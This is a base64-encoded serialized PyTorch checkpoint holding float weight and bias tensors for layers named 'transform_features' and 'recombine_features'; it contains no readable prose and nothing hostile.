lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4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